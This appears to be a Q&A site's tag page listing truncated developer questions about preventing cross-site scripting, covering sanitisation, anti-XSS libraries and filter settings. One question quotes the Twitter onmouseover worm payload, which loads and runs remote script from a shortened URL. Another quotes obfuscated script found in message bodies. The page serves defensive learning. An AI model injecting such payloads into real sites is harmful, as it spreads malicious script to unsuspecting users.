xss

Preventing XSS in Node.js / server side javascript

Hi all, Any idea how one would go about preventing XSS attacks on a node.js app? Any libs out there that handle removing javascript in hrefs, onclick attributes,etc. from POSTed data? I don't want to have to write a regex for all that :) Any suggestions? ...

JQuery append without HTML?

Hello I'm having XSS Vulnerability using jQuery's .append() function what I'm doing is appending raw chat messages coming from users and I don't want to strip html tags serversided or clientsided I just want to display them. Yet jquery's .append() method renders the html markup. anyway to do like appendText()? I tried .text() but it do...

Regex as first line of defense against XSS

I had a regex as the first line of defense against XSS. public static function standard_text($str) { // pL matches letters // pN matches numbers // pZ matches whitespace // pPc matches underscores // pPd matches dashes // pPo matches normal puncuation return (bool) preg_match('/^[\pL\pN\pZ\p{Pc}\p{Pd}\p{Po}]+...

sanitizing untrusted url strings that will be passed to location.replace

I'm getting a string from the current window's fragment identifier (location.hash). I want to use that string as the argument to location.replace(str). Under normal circumstances, the string will come from code I control, so I'm not worried about validating that the string is a URL. If the string isn't a URL, the call to replace will ...

Today's XSS onmouseover exploit on twitter.com

Can you explain what exactly happened on Twitter today? Basically the exploit was causing people to post a tweet containing this link: http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"/ Is this technically an XSS attack or something else? Here is how the Twitter home page l...

Codeigniter - Disable XSS filtering on a post basis

Hi, I'm trying to set up a CMS on the back of a site but when ever post data has a I've got $config['global_xss_filtering'] = TRUE; in config My question is there a way of disabling xss filtering for one item? e.g. $this->input->post('content', true); - turns it on, but how to turn it off? Thanks everyone. PVS ...

using encodeURI to display an entire page

Hi I am making a chrome extension. Where I save a page to the database as a string and then open it later as a dataURI scheme like: d = 'data:text/html;charset=utf-8'+encodeURI('HTML TEXT') location.reload(d); The problem with this is that the page, say its name is http://X/, in which I executed the above command loses the javascript ...

How to accept programming code input for displaying purposes?

What is the safest way to accept user inputted programming code in PHP, store it in database and display it back with the HTML pre tag? I currently convert the input to HTML entities, but I somehow think it wouldn't be that easy... Any suggestions? ...

XSS Best practices for an ASP.NET application

I have downloaded the latest version of the Xss Library, which seems like compiled with .NET 3.5 , but our ASP.NET application works in .NET v2.0 Is it possible to run this library with an ASP.NET v2.0 application. I don't think that will be possible without compiling the ASP.NET app against v3.5 ? Do you think V1.5 of the XSS library ...

How to handle Script Attack in application

We are facing issues of javascript getting embedded into message body, following is the code snippet of the javascript, } {*\htmltag241 var DanaShimData="var DSJsFuncs = ,null,,,,[{nm:\"Refresh\",lcnm:\"refresh\",flg:0xb},{nm:\ \"Install\",flg:0xf},{nm:\"writeln\",flg:0x3f},{nm:\ "GotoURL\ \",flg:0xe},{nm:\"AddRoot\",lcnm:\...

Could browser javascript harm my backend server?

Hi, I'm coding an application where I want to let the user learn javascript in this way: The user write javascript code on the browser like in an IDE. The user saves it and the code will be saved as a string in my backend No-SQL database (MongoDB/CouchDB). The user opens the application some days later and I pass that string to the we...

Cross-Site Authorization

The Scenario: 1. We have a site running .Net 4.0 who's manage the users, logins, data etc...; 2. We have another site running just client side script (javascript); We need: A. Log from client side site on .Net site; B. For the time of .Net session(15min) access data in Database , implementing some authorization, or save some info on cl...

Which Anti-XSS library should I use? Microsoft XSS 4.0, Web Protection Library on Codeplex, or other?

Seems like Microsoft updated the Anti XSS library today: http://www.microsoft.com/downloads/en/details.aspx?FamilyID=f4cd231b-7e06-445b-bec7-343e5884e651 In addition there is a new release of the Web Protection Library http://wpl.codeplex.com/ Are these two downloads the same thing? What XSS library should I be using? Are there ot...

How do I allow images in the HTMLPurifier?

I want to allow images within my HTML Purifier filter. Unfortunately they are still being filtered. WHat is wrong with this code? $config->set('HTML.Doctype', 'XHTML 1.0 Transitional'); $config->set('URI.DisableExternalResources', false); $config->set('URI.DisableResources', false); $config->set('HTML.Allowed', 'u,p,b,i,span[style],p,st...

Possible to have compiler support (type safety) for avoiding double encoding for anti-XSS during Web development?

Is it possible to have compiler support to enforce the cleanup of data (XSS encoding)? This question got me thinking about double encoding and the other times when encoding is needed. Seems like it would work great for Linq, but possibly I may need this feature in other scenarios as well. http://stackoverflow.com/questions/3774776/mic...

Why so much HTML input sanitization necessary ?

I have implemented a search engine in C for my html website. My entire web is programmed in C. I understand that html input sanitization is necessary because an attacker can input these 2 html snippets into my search page to trick my search page into downloading and displaying foreign images/scripts (XSS): <img src="path-to-attack-site...

Cakephp Security

I am new to Security of Web apps. I am developing an application in Cakephp and one of my friends told me about the Cross-site request forgery (CSRF) and cross-site scripting (XSS) attacks etc. not sure how many more are there. I need some help in understanding how to make Cakephp defend my web app against these. we are low budget and w...

How vunerable to XSS attacks is Flash?

The reason why I ask is that I'm telling a vendor of ours they have to use the MS AntiXSS library with the ASP.NET UI components they make, but they also work with Flex to build Flash based UIs - and I was wondering if there's an equivalent for Flash (assuming it's vunerable). ...

What are the risks associated with Hosting 3rd party Javascripts?

I'm a new developer at my company and I do mostly front-end web development. Our team is frequently asked by our Sales and Marketing people to incorporate 3rd party javascripts on our site. "Here's a 'little code snippet'. Our vendor asked if you could put this in our home page" This makes me very nervous. I know these scripts can ...

Use XSS on a site, Dynamically

Hi, I'm trying to find out if it's possible to check site's to be vulnerable to XSS dynamically, by using PHP. Are there solutions for this? Or is it just impossible and should it be done by hand? Kevin ...